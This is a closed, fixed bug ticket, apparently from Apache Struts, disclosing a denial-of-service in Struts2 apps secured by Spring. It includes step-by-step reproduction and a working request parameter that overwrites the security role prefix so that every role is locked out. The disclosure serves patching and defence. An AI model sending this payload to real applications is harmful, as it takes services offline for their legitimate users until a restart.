Details
-
Improvement
-
Status: Closed
-
Major
-
Resolution: Fixed
-
2.3.32, 2.5.10
-
Patch, Important
Description
This is a DoS attack example when Struts2 user uses Spring to secure his actions, like mentioned at section `Initializing Actions from Spring` of spring-plugin
Attack Steps:
- An anonymous user logins as an authenticated user.
- Then tries
http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
where
{action0-actionN}are actions available for users
Attack Impacts:
By replacing `rolePrefix`, attacker blocks access to secured actions for all defined roles even if they authenticate via login! so services are down and webapp restart is required to back to normal!!!
Configuration Example:
- spring-security.xml
<global-method-security secured-annotations="enabled" proxy-target-class = "true" /> <http auto-config="true" use-expressions="false"> <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" /> </http> <authentication-manager erase-credentials="false"> <authentication-provider> <user-service> <user name="admin" password="admin" authorities="ROLE_ADMIN" /> <user name="user" password="user" authorities="ROLE_USER" /> </user-service> </authentication-provider> </authentication-manager>
- applicationContext.xml
<bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
- struts.xml
<action name="admin" class="secureAction" method="admin"> <result name="success" type="json" /> </action> <action name="user" class="secureAction" method="user"> <result name="success" type="json" /> </action>
- SecureAction.java
package me.zamani.yasser.ww_convention.actions; import org.springframework.security.access.annotation.Secured; public class SecureAction { @Secured({"ROLE_ADMIN"}) public String admin() { return "success"; } @Secured({"ROLE_USER"}) public String user() { return "success"; } }
- login via
http://{ip}:{port}/login
as user.
- open
http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
- in another browser, login via
http://{ip}:{port}/login
as admin.
- try to access
http://{ip}:{port}/admin
which fails!
- also repeat 5 and try open
http://{ip}:{port}/user
which also fails!
- Services are down and webapp restart is required to back to normal.